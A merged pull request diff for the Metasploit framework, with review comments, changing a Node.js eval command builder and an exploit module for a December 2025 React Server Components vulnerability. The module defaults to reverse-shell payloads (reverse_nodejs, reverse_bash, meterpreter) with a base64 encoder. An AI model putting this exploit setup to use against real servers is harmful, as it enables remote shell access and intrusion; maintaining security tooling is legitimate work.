Merged
Changes from 2 commits
2 changes: 1 addition & 1 deletion lib/msf/core/payload/nodejs.rb
Expand Up @@ -85,6 +85,6 @@ def nodejs_reverse_tcp(opts={})
# @param [String] code the javascript code to run
# @return [String] a command that invokes "node" and passes the code
def nodejs_cmd(code)
"node -e 'eval(\"#{Rex::Text.to_hex(code, "\\x")}\");'"
"node -e 'eval(\"#{code.gsub(/[^a-z0-9\s]/i) { |char| Rex::Text.to_hex(char, '\\x') }}\");'"
end
end
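Review bot: In nodejs_cmd, the new character class `[^a-z0-9\s]` leaves all whitespace unescaped, and `\s` also matches line breaks, so a multi-line `code` argument would put a raw newline inside the double-quoted string handed to eval and the script would fail to parse. Consider narrowing the class to a literal space (`/[^a-z0-9 ]/i`) so newlines and carriage returns are hex-escaped like every other non-alphanumeric character, and update the @param/@return comments to say that only non-alphanumeric characters are escaped now.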
Expand Up @@ -32,16 +32,17 @@ def initialize(info = {})
['URL', 'https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components'],
['URL', 'https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3']
],
'Platform' => ['multi'],
'Platform' => %w[unix linux win],
Contributor

Why not 'multi'?

Contributor Author

Although it's placed in the exploits/multi folder, the platforms should be explicitly defined like so

'Arch' => [ARCH_CMD],
'Targets' => [
[
'Unix Command',
{
'Platform' => ['unix', 'linux'],
'DefaultOptions' => {
'FETCH_COMMAND' => 'WGET'
'PAYLOAD' => 'cmd/unix/reverse_nodejs'
}
# Tested with cmd/unix/reverse_nodejs
# Tested with cmd/unix/reverse_bash
# Tested with cmd/linux/http/x64/meterpreter/reverse_tcp
}
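Review bot: The module-level 'Platform' now lists win, but the only target visible in this hunk ('Unix Command') is restricted to unix and linux and all three "Tested with" comments name Unix or Linux payloads, so nothing in these lines shows the Windows path was exercised. Either record the Windows payload that was tested alongside the others or leave win out until it has been. The "Tested with" comments would also be easier to find above the target entry or in the module documentation than after 'DefaultOptions' inside the hash, and since the 'FETCH_COMMAND' => 'WGET' default is dropped, the HTTP fetch payload listed as tested now depends on the framework default, which deserves a line in the PR description.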
Expand All @@ -55,7 +56,8 @@ def initialize(info = {})
],
],
'Payload' => {
'BadChars' => '"'
'BadChars' => '"',
'Encoder' => 'cmd/base64'
},
'DefaultTarget' => 0,
'DisclosureDate' => '2025-12-03',
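Review bot: 'Encoder' => 'cmd/base64' in the module-level 'Payload' hash pins one encoder for every target, including the win platform this PR adds to 'Platform', and there is no comment saying why it is needed next to the existing 'BadChars' entry. Add a short comment giving the reason, and if the encoder is only required for the Unix command target, set it in that target's options rather than module-wide.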